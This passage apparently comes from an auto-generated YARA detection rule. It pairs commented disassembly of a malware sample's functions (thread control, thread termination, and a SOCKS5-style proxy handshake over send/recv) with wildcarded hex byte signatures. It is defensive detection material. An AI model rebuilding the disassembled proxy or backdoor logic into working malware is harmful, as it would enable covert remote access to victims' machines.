0x00407ecc ;msvcrt._beginthreadex(arg0,arg1,0x00407890,local16,arg4,arg6) + .text:0x0040793f 8b542428 mov edx,dword [esp + 40] + .text:0x00407943 83c418 add esp,24 + .text:0x00407946 8bf0 mov esi,eax + .text:0x00407948 6aff push 0xffffffff + .text:0x0040794a 52 push edx + .text:0x0040794b ff158c904000 call dword [0x0040908c] ;kernel32.WaitForSingleObject(kernel32.CreateEventA(0,0,0,0),0xffffffff) + .text:0x00407951 8b442410 mov eax,dword [esp + 16] + .text:0x00407955 50 push eax + .text:0x00407956 ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(<0x0040790e>) + .text:0x0040795c 8bc6 mov eax,esi + .text:0x0040795e 5e pop esi + .text:0x0040795f 83c410 add esp,16 + .text:0x00407962 c3 ret + */ + $c19 = { 83 EC 10 8B 44 24 ?? 8B 4C 24 ?? 8A 54 24 ?? 56 8B 35 ?? ?? ?? ?? 6A 00 89 44 24 ?? 89 4C 24 ?? 88 54 24 ?? FF D6 6A 00 6A 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 6A 00 89 44 24 ?? FF D6 8B 4C 24 ?? 8D 44 24 ?? 50 8B 44 24 ?? 8D 54 24 ?? 51 8B 4C 24 ?? 52 68 90 78 40 00 50 51 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 18 8B F0 6A FF 52 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 5E 83 C4 10 C3 } + /* +Basic Block at 0x00403685@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - terminate thread + .text:0x00403685 loc_00403685: [1 XREFS] + .text:0x00403685 6a00 push 0 + .text:0x00403687 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403689 8b07 mov eax,dword [edi] + .text:0x0040368b 6aff push 0xffffffff + .text:0x0040368d 50 push eax + .text:0x0040368e ff15c8904000 call dword [0x004090c8] ;kernel32.TerminateThread(0x61616161,0xffffffff) + .text:0x00403694 6a00 push 0 + .text:0x00403696 ffd6 call esi ;kernel32.Sleep(0) + .text:0x00403698 8b0f mov ecx,dword [edi] + .text:0x0040369a 51 push ecx + .text:0x0040369b ff1588904000 call dword [0x00409088] ;kernel32.CloseHandle(0x61616161) + .text:0x004036a1 6a00 push 0 + .text:0x004036a3 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004036a5 8b85549f0000 mov eax,dword [ebp + 40788] + .text:0x004036ab 43 inc ebx + .text:0x004036ac 83c704 add edi,4 + .text:0x004036af 3bd8 cmp ebx,eax + .text:0x004036b1 72d2 jc 0x00403685 + */ + $c20 = { 6A 00 FF D6 8B 07 6A FF 50 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 0F 51 FF 15 ?? ?? ?? ?? 6A 00 FF D6 8B 85 ?? ?? ?? ?? 43 83 C7 04 3B D8 72 ?? } + /* +function at 0x004019c0@9324d1a8ae37a36ae560c37448c9705a with 6 features: + - get socket status + - receive data + - receive data on socket + - resolve DNS + - send data + - send data on socket + .text:0x004019c0 + .text:0x004019c0 FUNC: int stdcall sub_004019c0( int arg0, int arg1, ) [2 XREFS] + .text:0x004019c0 + .text:0x004019c0 Stack Variables: (offset from initial top of stack) + .text:0x004019c0 8: int arg1 + .text:0x004019c0 4: int arg0 + .text:0x004019c0 -600: int local600 + .text:0x004019c0 -603: int local603 + .text:0x004019c0 -604: int local604 + .text:0x004019c0 -607: int local607 + .text:0x004019c0 -608: int local608 + .text:0x004019c0 -862: int local862 + .text:0x004019c0 -863: int local863 + .text:0x004019c0 -864: int local864 + .text:0x004019c0 -1116: int local1116 + .text:0x004019c0 -1120: int local1120 + .text:0x004019c0 -1124: int local1124 + .text:0x004019c0 -1128: int local1128 + .text:0x004019c0 -1132: int local1132 + .text:0x004019c0 -1133: int local1133 + .text:0x004019c0 -1134: int local1134 + .text:0x004019c0 -1135: int local1135 + .text:0x004019c0 -1136: int local1136 + .text:0x004019c0 -1140: int local1140 + .text:0x004019c0 -1144: int local1144 + .text:0x004019c0 -1145: int local1145 + .text:0x004019c0 -1146: int local1146 + .text:0x004019c0 -1147: int local1147 + .text:0x004019c0 -1148: int local1148 + .text:0x004019c0 + .text:0x004019c0 81ec7c040000 sub esp,1148 + .text:0x004019c6 53 push ebx + .text:0x004019c7 55 push ebp + .text:0x004019c8 8b2d14924000 mov ebp,dword [0x00409214] + .text:0x004019ce 56 push esi + .text:0x004019cf 8bf1 mov esi,ecx + .text:0x004019d1 57 push edi + .text:0x004019d2 6a00 push 0 + .text:0x004019d4 8d442414 lea eax,dword [esp + 20] + .text:0x004019d8 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x004019de 6a04 push 4 + .text:0x004019e0 b302 mov bl,2 + .text:0x004019e2 50 push eax + .text:0x004019e3 51 push ecx + .text:0x004019e4 c744242803000000 mov dword [esp + 40],3 + .text:0x004019ec c744242c00000000 mov dword [esp + 44],0 + .text:0x004019f4 c644242005 mov byte [esp + 32],5 + .text:0x004019f9 885c2421 mov byte [esp + 33],bl + .text:0x004019fd c644242200 mov byte [esp + 34],0 + .text:0x00401a02 885c2423 mov byte [esp + 35],bl + .text:0x00401a06 ffd5 call ebp ;ws2_32.send(0x61616161,local1148,4,0) + .text:0x00401a08 b996000000 mov ecx,150 + .text:0x00401a0d 33c0 xor eax,eax + .text:0x00401a0f 8dbc2434020000 lea edi,dword [esp + 564] + .text:0x00401a16 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401a1c f3ab rep: stosd + .text:0x00401a1e 8d442418 lea eax,dword [esp + 24] + .text:0x00401a22 8d4c242c lea ecx,dword [esp + 44] + .text:0x00401a26 50 push eax + .text:0x00401a27 6a00 push 0 + .text:0x00401a29 6a00 push 0 + .text:0x00401a2b 51 push ecx + .text:0x00401a2c 6a00 push 0 + .text:0x00401a2e 89542444 mov dword [esp + 68],edx + .text:0x00401a32 c744244001000000 mov dword [esp + 64],1 + .text:0x00401a3a ff1510924000 call dword [0x00409210] ;ws2_32.select(0,local1120,0,0,local1140) + .text:0x00401a40 85c0 test eax,eax + .text:0x00401a42 7f0c jg 0x00401a50 + .text:0x00401a44 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401a4a 52 push edx + .text:0x00401a4b e95d020000 jmp 0x00401cad + .text:0x00401a50 loc_00401a50: [1 XREFS] + .text:0x00401a50 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401a56 6a00 push 0 + .text:0x00401a58 8d842438020000 lea eax,dword [esp + 568] + .text:0x00401a5f 6858020000 push 600 + .text:0x00401a64 50 push eax + .text:0x00401a65 51 push ecx + .text:0x00401a66 ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,local600,600) + .text:0x00401a6c 80bc243402000005 cmp byte [esp + 564],5 + .text:0x00401a74 0f852c020000 jnz 0x00401ca6 + .text:0x00401a7a 8a842435020000 mov al,byte [esp + 565] + .text:0x00401a81 84c0 test al,al + .text:0x00401a83 740a jz 0x00401a8f + .text:0x00401a85 3ac3 cmp al,bl + .text:0x00401a87 0f8519020000 jnz 0x00401ca6 + .text:0x00401a8d eb08 jmp 0x00401a97 + .text:0x00401a8f loc_00401a8f: [1 XREFS] + .text:0x00401a8f 3ac3 cmp al,bl + .text:0x00401a91 0f8530010000 jnz 0x00401bc7 + .text:0x00401a97 loc_00401a97: [1 XREFS] + .text:0x00401a97 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401a9d 68a0a54000 push 0x0040a5a0 + .text:0x00401aa2 e8492c0000 call 0x004046f0 ;sub_004046f0(0x0040a5a0) + .text:0x00401aa7 85c0 test eax,eax + .text:0x00401aa9 0f8618010000 jbe 0x00401bc7 + .text:0x00401aaf 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401ab5 68a0a54000 push 0x0040a5a0 + .text:0x00401aba e8312c0000 call 0x004046f0 ;sub_004046f0(0x0040a5a0) + .text:0x00401abf 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401ac5 68a0a64000 push 0x0040a6a0 + .text:0x00401aca 8bd8 mov ebx,eax + .text:0x00401acc e81f2c0000 call 0x004046f0 ;sub_004046f0(0x0040a6a0) + .text:0x00401ad1 89442414 mov dword [esp + 20],eax + .text:0x00401ad5 b940000000 mov ecx,64 + .text:0x00401ada 33c0 xor eax,eax + .text:0x00401adc 8dbc2430010000 lea edi,dword [esp + 304] + .text:0x00401ae3 f3ab rep: stosd + .text:0x00401ae5 66ab stosd + .text:0x00401ae7 8b3d94904000 mov edi,dword [0x00409094] + .text:0x00401aed 8d942432010000 lea edx,dword [esp + 306] + .text:0x00401af4 68a0a54000 push 0x0040a5a0 + .text:0x00401af9 52 push edx + .text:0x00401afa c684243801000005 mov byte [esp + 312],5 + .text:0x00401b02 889c2439010000 mov byte [esp + 313],bl + .text:0x00401b09 ffd7 call edi ;kernel32.lstrcpyA(local862,0x0040a5a0) + .text:0x00401b0b 8d442414 lea eax,dword [esp + 20] + .text:0x00401b0f 6a04 push 4 + .text:0x00401b11 8d8c1c36010000 lea ecx,dword [esp + ebx + 310] + .text:0x00401b18 50 push eax + .text:0x00401b19 51 push ecx + .text:0x00401b1a 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401b20 e83b2a0000 call 0x00404560 ;sub_00404560(0x010c2c61,local1148,4) + .text:0x00401b25 8d941c33010000 lea edx,dword [esp + ebx + 307] + .text:0x00401b2c 68a0a64000 push 0x0040a6a0 + .text:0x00401b31 52 push edx + .text:0x00401b32 ffd7 call edi ;kernel32.lstrcpyA(0x010c2c62,0x0040a6a0) + .text:0x00401b34 8b442414 mov eax,dword [esp + 20] + .text:0x00401b38 6a00 push 0 + .text:0x00401b3a 8d942434010000 lea edx,dword [esp + 308] + .text:0x00401b41 8d4c1803 lea ecx,dword [eax + ebx + 3] + .text:0x00401b45 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401b4b 51 push ecx + .text:0x00401b4c 52 push edx + .text:0x00401b4d 50 push eax + .text:0x00401b4e ffd5 call ebp ;ws2_32.send(0x61616161,local864,0x82b78021,0) + .text:0x00401b50 8d542418 lea edx,dword [esp + 24] + .text:0x00401b54 33c0 xor eax,eax + .text:0x00401b56 b996000000 mov ecx,150 + .text:0x00401b5b 8dbc2434020000 lea edi,dword [esp + 564] + .text:0x00401b62 52 push edx + .text:0x00401b63 50 push eax + .text:0x00401b64 f3ab rep: stosd + .text:0x00401b66 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401b6c 50 push eax + .text:0x00401b6d 8d442438 lea eax,dword [esp + 56] + .text:0x00401b71 894c243c mov dword [esp + 60],ecx + .text:0x00401b75 50 push eax + .text:0x00401b76 6a00 push 0 + .text:0x00401b78 c744244001000000 mov dword [esp + 64],1 + .text:0x00401b80 ff1510924000 call dword [0x00409210] ;ws2_32.select(0,local1124,0,0,local1144) + .text:0x00401b86 85c0 test eax,eax + .text:0x00401b88 0f8e18010000 jle 0x00401ca6 + .text:0x00401b8e 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401b94 6a00 push 0 + .text:0x00401b96 8d942438020000 lea edx,dword [esp + 568] + .text:0x00401b9d 6858020000 push 600 + .text:0x00401ba2 52 push edx + .text:0x00401ba3 50 push eax + .text:0x00401ba4 ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,local604,600) + .text:0x00401baa 80bc243402000005 cmp byte [esp + 564],5 + .text:0x00401bb2 0f85ee000000 jnz 0x00401ca6 + .text:0x00401bb8 8a842435020000 mov al,byte [esp + 565] + .text:0x00401bbf 84c0 test al,al + .text:0x00401bc1 0f85df000000 jnz 0x00401ca6 + .text:0x00401bc7 loc_00401bc7: [2 XREFS] + .text:0x00401bc7 8b942490040000 mov edx,dword [esp + 1168] + .text:0x00401bce 52 push edx + .text:0x00401bcf ff15fc914000 call dword [0x004091fc] ;ws2_32.gethostbyname(sp+0) + .text:0x00401bd5 85c0 test eax,eax + .text:0x00401bd7 0f84d6000000 jz 0x00401cb3 + .text:0x00401bdd c644242005 mov byte [esp + 32],5 + .text:0x00401be2 c644242101 mov byte [esp + 33],1 + .text:0x00401be7 c644242200 mov byte [esp + 34],0 + .text:0x00401bec c644242301 mov byte [esp + 35],1 + .text:0x00401bf1 8b400c mov eax,dword [eax + 12] + .text:0x00401bf4 8b08 mov ecx,dword [eax] + .text:0x00401bf6 8b842494040000 mov eax,dword [esp + 1172] + .text:0x00401bfd 50 push eax + .text:0x00401bfe 8b11 mov edx,dword [ecx] + .text:0x00401c00 89542428 mov dword [esp + 40],edx + .text:0x00401c04 ff1508924000 call dword [0x00409208] ;ws2_32.ntohs(arg0) + .text:0x00401c0a 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401c10 6a00 push 0 + .text:0x00401c12 8d4c2424 lea ecx,dword [esp + 36] + .text:0x00401c16 6a0a push 10 + .text:0x00401c18 51 push ecx + .text:0x00401c19 52 push edx + .text:0x00401c1a 6689442438 mov word [esp + 56],ax + .text:0x00401c1f ffd5 call ebp ;ws2_32.send(0x61616161,local1136,10,0) + .text:0x00401c21 b996000000 mov ecx,150 + .text:0x00401c26 33c0 xor eax,eax + .text:0x00401c28 8dbc2434020000 lea edi,dword [esp + 564] + .text:0x00401c2f 8d54242c lea edx,dword [esp + 44] + .text:0x00401c33 f3ab rep: stosd + .text:0x00401c35 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401c3b 8d4c2418 lea ecx,dword [esp + 24] + .text:0x00401c3f 51 push ecx + .text:0x00401c40 6a00 push 0 + .text:0x00401c42 6a00 push 0 + .text:0x00401c44 52 push edx + .text:0x00401c45 6a00 push 0 + .text:0x00401c47 89442444 mov dword [esp + 68],eax + .text:0x00401c4b c744244001000000 mov dword [esp + 64],1 + .text:0x00401c53 ff1510924000 call dword [0x00409210] ;ws2_32.select(0,local1124,0,0,local1144) + .text:0x00401c59 85c0 test eax,eax + .text:0x00401c5b 7f09 jg 0x00401c66 + .text:0x00401c5d loc_00401c5d: [2 XREFS] + .text:0x00401c5d 8b86a8000000 mov eax,dword [esi + 168] + .text:0x00401c63 50 push eax + .text:0x00401c64 eb47 jmp 0x00401cad + .text:0x00401c66 loc_00401c66: [1 XREFS] + .text:0x00401c66 8b96a8000000 mov edx,dword [esi + 168] + .text:0x00401c6c 6a00 push 0 + .text:0x00401c6e 8d8c2438020000 lea ecx,dword [esp + 568] + .text:0x00401c75 6858020000 push 600 + .text:0x00401c7a 51 push ecx + .text:0x00401c7b 52 push edx + .text:0x00401c7c ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,local604,600) + .text:0x00401c82 80bc243402000005 cmp byte [esp + 564],5 + .text:0x00401c8a 75d1 jnz 0x00401c5d + .text:0x00401c8c 8a842435020000 mov al,byte [esp + 565] + .text:0x00401c93 84c0 test al,al + .text:0x00401c95 75c6 jnz 0x00401c5d + .text:0x00401c97 5f pop edi + .text:0x00401c98 5e pop esi + .text:0x00401c99 5d pop ebp + .text:0x00401c9a b001 mov al,1 + .text:0x00401c9c 5b pop ebx + .text:0x00401c9d 81c47c040000 add esp,1148 + .text:0x00401ca3 c20800 ret 8 + .text:0x00401ca6 loc_00401ca6: [5 XREFS] + .text:0x00401ca6 8b8ea8000000 mov ecx,dword [esi + 168] + .text:0x00401cac 51 push ecx + .text:0x00401cad loc_00401cad: [2 XREFS] + .text:0x00401cad ff1504924000 call dword [0x00409204] ;ws2_32.closesocket(0x61616161) + .text:0x00401cb3 loc_00401cb3: [1 XREFS] + .text:0x00401cb3 5f pop edi + .text:0x00401cb4 5e pop esi + .text:0x00401cb5 5d pop ebp + .text:0x00401cb6 32c0 xor al,al + .text:0x00401cb8 5b pop ebx + .text:0x00401cb9 81c47c040000 add esp,1148 + .text:0x00401cbf c20800 ret 8 + */ + $c21 = { 81 EC 7C 04 00 00 53 55 8B 2D ?? ?? ?? ?? 56 8B F1 57 6A 00 8D 44 24 ?? 8B 8E ?? ?? ?? ?? 6A 04 B3 02 50 51 C7 44 24 ?? 03 00 00 00 C7 44 24 ?? 00 00 00 00 C6 44 24 ?? 05 88 5C 24 ?? C6 44 24 ?? 00 88 5C 24 ?? FF D5 B9 96 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 8B 96 ?? ?? ?? ?? F3 AB 8D 44 24 ?? 8D 4C 24 ?? 50 6A 00 6A 00 51 6A 00 89 54 24 ?? C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 8B 96 ?? ?? ?? ?? 52 E9 ?? ?? ?? ?? 8B 8E ?? ?? ?? ?? 6A 00 8D 84 24 ?? ?? ?? ?? 68 58 02 00 00 50 51 FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? 05 0F 85 ?? ?? ?? ?? 8A 84 24 ?? ?? ?? ?? 84 C0 74 ?? 3A C3 0F 85 ?? ?? ?? ?? EB ?? 3A C3 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 A0 A5 40 00 E8 ?? ?? ?? ?? 85 C0 0F 86 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 A0 A5 40 00 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 68 A0 A6 40 00 8B D8 E8 ?? ?? ?? ?? 89 44 24 ?? B9 40 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? F3 AB 66 AB 8B 3D ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 A0 A5 40 00 52 C6 84 24 ?? ?? ?? ?? 05 88 9C 24 ?? ?? ?? ?? FF D7 8D 44 24 ?? 6A 04 8D 8C 1C ?? ?? ?? ?? 50 51 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 94 1C ?? ?? ?? ?? 68 A0 A6 40 00 52 FF D7 8B 44 24 ?? 6A 00 8D 94 24 ?? ?? ?? ?? 8D 4C 18 ?? 8B 86 ?? ?? ?? ?? 51 52 50 FF D5 8D 54 24 ?? 33 C0 B9 96 00 00 00 8D BC 24 ?? ?? ?? ?? 52 50 F3 AB 8B 8E ?? ?? ?? ?? 50 8D 44 24 ?? 89 4C 24 ?? 50 6A 00 C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 0F 8E ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 6A 00 8D 94 24 ?? ?? ?? ?? 68 58 02 00 00 52 50 FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? 05 0F 85 ?? ?? ?? ?? 8A 84 24 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C6 44 24 ?? 05 C6 44 24 ?? 01 C6 44 24 ?? 00 C6 44 24 ?? 01 8B 40 ?? 8B 08 8B 84 24 ?? ?? ?? ?? 50 8B 11 89 54 24 ?? FF 15 ?? ?? ?? ?? 8B 96 ?? ?? ?? ?? 6A 00 8D 4C 24 ?? 6A 0A 51 52 66 89 44 24 ?? FF D5 B9 96 00 00 00 33 C0 8D BC 24 ?? ?? ?? ?? 8D 54 24 ?? F3 AB 8B 86 ?? ?? ?? ?? 8D 4C 24 ?? 51 6A 00 6A 00 52 6A 00 89 44 24 ?? C7 44 24 ?? 01 00 00 00 FF 15 ?? ?? ?? ?? 85 C0 7F ?? 8B 86 ?? ?? ?? ?? 50 EB ?? 8B 96 ?? ?? ?? ?? 6A 00 8D 8C 24 ?? ?? ?? ?? 68 58 02 00 00 51 52 FF 15 ?? ?? ?? ?? 80 BC 24 ?? ?? ?? ?? 05 75 ?? 8A 84 24 ?? ?? ?? ?? 84 C0 75 ?? 5F 5E 5D B0 01 5B 81 C4 7C 04 00 00 C2 08 00 8B 8E ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5D 32 C0 5B 81 C4 7C 04 00 00 C2 08 00 } + /* +function at 0x00401cd0@9324d1a8ae37a36ae560c37448c9705a with 3 features: + - get socket status + - receive data + - receive data on socket + .text:0x00401cd0 + .text:0x00401cd0 FUNC: int stdcall sub_00401cd0( int arg0, ) [1 XREFS] + .text:0x00401cd0 + .text:0x00401cd0 Stack Variables: (offset from initial top of stack) + .text:0x00401cd0 4: int arg0 + .text:0x00401cd0 -8: int local8 + .text:0x00401cd0 -12: int local12 + .text:0x00401cd0 -32: int local32 + .text:0x00401cd0 -36: int local36 + .text:0x00401cd0 -40: int local40 + .text:0x00401cd0 -44: int local44 + .text:0x00401cd0 + .text:0x00401cd0 6aff push 0xffffffff ;int + .text:0x00401cd2 64a100000000 fs: mov eax,dword [0x00000000] + .text:0x00401cd8 68b6834000 push 0x004083b6 + .text:0x00401cdd 50 push eax + .text:0x00401cde b85c230000 mov eax,0x0000235c + .text:0x00401ce3 64892500000000 fs: mov dword [0x00000000],esp + .text:0x00401cea e821610000 call 0x00407e10 ;__alloca_probe() + .text:0x00401cef 53 push ebx + .text:0x00401cf0 55 push ebp + .text:0x00401cf1 8b2d78904000 mov ebp,dword [0x00409078] + .text:0x00401cf7 56 push esi + .text:0x00401cf8 57 push edi + .text:0x00401cf9 6a00 push 0 + .text:0x00401cfb ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401cfd 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401d01 e8faf2ffff call 0x00401000 ;sub_00401000(0xbfb07fd0) + .text:0x00401d06 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401d0a c784247423000000 mov dword [esp + 9076],0 + .text:0x00401d15 e8e6f2ffff call 0x00401000 ;sub_00401000(local8) + .text:0x00401d1a 8b9c247c230000 mov ebx,dword [esp + 9084] + .text:0x00401d21 c684247423000001 mov byte [esp + 9076],1 + .text:0x00401d29 8bcb mov ecx,ebx + .text:0x00401d2b c784246401000001 mov dword [esp + 356],1 + .text:0x00401d36 8b83a8000000 mov eax,dword [ebx + 168] + .text:0x00401d3c 89842468010000 mov dword [esp + 360],eax + .text:0x00401d43 e888020000 call 0x00401fd0 ;sub_00401fd0(0x61616161) + .text:0x00401d48 84c0 test al,al + .text:0x00401d4a 0f842d020000 jz 0x00401f7d + .text:0x00401d50 loc_00401d50: [1 XREFS] + .text:0x00401d50 b941000000 mov ecx,65 + .text:0x00401d55 8db42464010000 lea esi,dword [esp + 356] + .text:0x00401d5c 8dbc2468020000 lea edi,dword [esp + 616] + .text:0x00401d63 6a00 push 0 + .text:0x00401d65 f3a5 rep: movsd + .text:0x00401d67 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401d69 6a00 push 0 + .text:0x00401d6b 6a00 push 0 + .text:0x00401d6d 8d8c2470020000 lea ecx,dword [esp + 624] + .text:0x00401d74 6a00 push 0 + .text:0x00401d76 51 push ecx + .text:0x00401d77 6a00 push 0 + .text:0x00401d79 ff1510924000 call dword [0x00409210] ;ws2_32.select(0,0xbfb081fc,0,0,0) + .text:0x00401d7f 83f8ff cmp eax,0xffffffff + .text:0x00401d82 0f84ee010000 jz 0x00401f76 + .text:0x00401d88 85c0 test eax,eax + .text:0x00401d8a 0f8ed3010000 jle 0x00401f63 + .text:0x00401d90 b900080000 mov ecx,2048 + .text:0x00401d95 33c0 xor eax,eax + .text:0x00401d97 8dbc246c030000 lea edi,dword [esp + 876] + .text:0x00401d9e 6a01 push 1 + .text:0x00401da0 f3ab rep: stosd + .text:0x00401da2 ffd5 call ebp ;kernel32.Sleep(1) + .text:0x00401da4 8b83a8000000 mov eax,dword [ebx + 168] + .text:0x00401daa 6a00 push 0 + .text:0x00401dac 8d942470030000 lea edx,dword [esp + 880] + .text:0x00401db3 6800200000 push 0x00002000 + .text:0x00401db8 52 push edx + .text:0x00401db9 50 push eax + .text:0x00401dba ff150c924000 call dword [0x0040920c] ;ws2_32.recv(0x61616161,0xbfb08300,0x00002000) + .text:0x00401dc0 8bf0 mov esi,eax + .text:0x00401dc2 6a00 push 0 + .text:0x00401dc4 85f6 test esi,esi + .text:0x00401dc6 0f8ea8010000 jle 0x00401f74 + .text:0x00401dcc ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401dce 8d8c246c030000 lea ecx,dword [esp + 876] + .text:0x00401dd5 56 push esi + .text:0x00401dd6 51 push ecx + .text:0x00401dd7 8d4c241c lea ecx,dword [esp + 28] + .text:0x00401ddb e8a0f2ffff call 0x00401080 ;sub_00401080(local12,0xbfb082fc,ws2_32.recv(0x61616161,0xbfb08300,0x00002000)) + .text:0x00401de0 b93f000000 mov ecx,63 + .text:0x00401de5 33c0 xor eax,eax + .text:0x00401de7 8d7c2465 lea edi,dword [esp + 101] + .text:0x00401deb c644246400 mov byte [esp + 100],0 + .text:0x00401df0 f3ab rep: stosd + .text:0x00401df2 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401df8 6800010000 push 256 + .text:0x00401dfd 66ab stosd + .text:0x00401dff 8d542468 lea edx,dword [esp + 104] + .text:0x00401e03 68a0a74000 push 0x0040a7a0 + .text:0x00401e08 52 push edx + .text:0x00401e09 aa stosb + .text:0x00401e0a e851270000 call 0x00404560 ;sub_00404560(0xbfb07fec,0x0040a7a0,256) + .text:0x00401e0f 6a00 push 0 + .text:0x00401e11 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e13 83fe09 cmp esi,9 + .text:0x00401e16 7c11 jl 0x00401e29 + .text:0x00401e18 8d84246c030000 lea eax,dword [esp + 876] + .text:0x00401e1f 6a09 push 9 + .text:0x00401e21 8d4c2468 lea ecx,dword [esp + 104] + .text:0x00401e25 50 push eax + .text:0x00401e26 51 push ecx + .text:0x00401e27 eb0e jmp 0x00401e37 + .text:0x00401e29 loc_00401e29: [1 XREFS] + .text:0x00401e29 8d94246c030000 lea edx,dword [esp + 876] + .text:0x00401e30 56 push esi + .text:0x00401e31 8d442468 lea eax,dword [esp + 104] + .text:0x00401e35 52 push edx + .text:0x00401e36 50 push eax + .text:0x00401e37 loc_00401e37: [1 XREFS] + .text:0x00401e37 8b0dd4aa4000 mov ecx,dword [0x0040aad4] + .text:0x00401e3d e8ae2b0000 call 0x004049f0 ;sub_004049f0(0xbfb07fec,0xbfb082f4,<0x00401dba>) + .text:0x00401e42 6a00 push 0 + .text:0x00401e44 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e46 8d8c246c030000 lea ecx,dword [esp + 876] + .text:0x00401e4d 56 push esi + .text:0x00401e4e 51 push ecx + .text:0x00401e4f 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00401e53 e828f2ffff call 0x00401080 ;sub_00401080(0xbfb07fc4,0xbfb082f4,<0x00401dba>) + .text:0x00401e58 6a00 push 0 + .text:0x00401e5a c744241400000000 mov dword [esp + 20],0 + .text:0x00401e62 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e64 6a04 push 4 + .text:0x00401e66 6a05 push 5 + .text:0x00401e68 8d4c2444 lea ecx,dword [esp + 68] + .text:0x00401e6c e81ff7ffff call 0x00401590 ;sub_00401590(0xbfb07fbc,5) + .text:0x00401e71 8d542414 lea edx,dword [esp + 20] + .text:0x00401e75 50 push eax + .text:0x00401e76 52 push edx + .text:0x00401e77 e86a5f0000 call 0x00407de6 ;msvcrt.memmove(local36,sub_00401590(0xbfb07fbc,5),5) + .text:0x00401e7c 83c40c add esp,12 + .text:0x00401e7f 6a00 push 0 + .text:0x00401e81 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401e83 6a00 push 0 + .text:0x00401e85 8d4c2440 lea ecx,dword [esp + 64] + .text:0x00401e89 bf94a54000 mov edi,0x0040a594 + .text:0x00401e8e e8fdf6ffff call 0x00401590 ;sub_00401590(0xbfb07fb8,0) + .text:0x00401e93 8bf0 mov esi,eax + .text:0x00401e95 b905000000 mov ecx,5 + .text:0x00401e9a 33c0 xor eax,eax + .text:0x00401e9c f3a6 rep: cmpsb + .text:0x00401e9e 50 push eax + .text:0x00401e9f 0f85a2000000 jnz 0x00401f47 + .text:0x00401ea5 ffd5 call ebp ;kernel32.Sleep(0) + .text:0x00401ea7 8b442410 mov eax,dword [esp + 16] + .text:0x00401eab 85c0 test eax,eax + .text:0x00401ead 0f84b0000000 jz 0x00401f63 + .text:0x00401eb3 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401eb7 e8c4f3ffff call 0x00401280 ;sub_00401280(local36) + .text:0x00401ebc 8b4c2410 mov ecx,dword [esp + 16] + .text:0x00401ec0 3bc1 cmp eax,ecx + .text:0x00401ec2 0f829b000000 jc 0x00401f63 + .text:0x00401ec8 51 push ecx + .text:0x00401ec9 e82e5f0000 call 0x00407dfc ;msvcrt.??2@YAPAXI@Z(0xbfb082fc) + .text:0x00401ece 8b4c2414 mov ecx,dword [esp + 20] + .text:0x00401ed2 83c404 add esp,4 + .text:0x00401ed5 8bf0 mov esi,eax + .text:0x00401ed7 51 push ecx + .text:0x00401ed8 6a00 push 0 + .text:0x00401eda 8d4c241c lea ecx,dword [esp + 28] + .text:0x00401ede e8adf6ffff call 0x00401590 ;sub_00401590(local36,0) + .text:0x00401ee3 50 push eax + .text:0x00401ee4 56 push esi + .text:0x00401ee5 e8fc5e0000 call 0x00407de6 ;msvcrt.memmove(msvcrt.??2@YAPAXI@Z(0xbfb082fc),sub_00401590(local36,0),0) + .text:0x00401eea 83c40c add esp,12 + .text:0x00401eed 8d4c243c lea ecx,dword [esp + 60] + .text:0x00401ef1 e8eaf5ffff call 0x004014e0 ;sub_004014e0(0xbfb07fb0) + .text:0x00401ef6 8d4c2414 lea ecx,dword [esp + 20] + .text:0x00401efa e8e1f5ffff call 0x004014e0 ;sub_004014e0(local40) + .text:0x00401eff 8b0dd4aa4000 mov 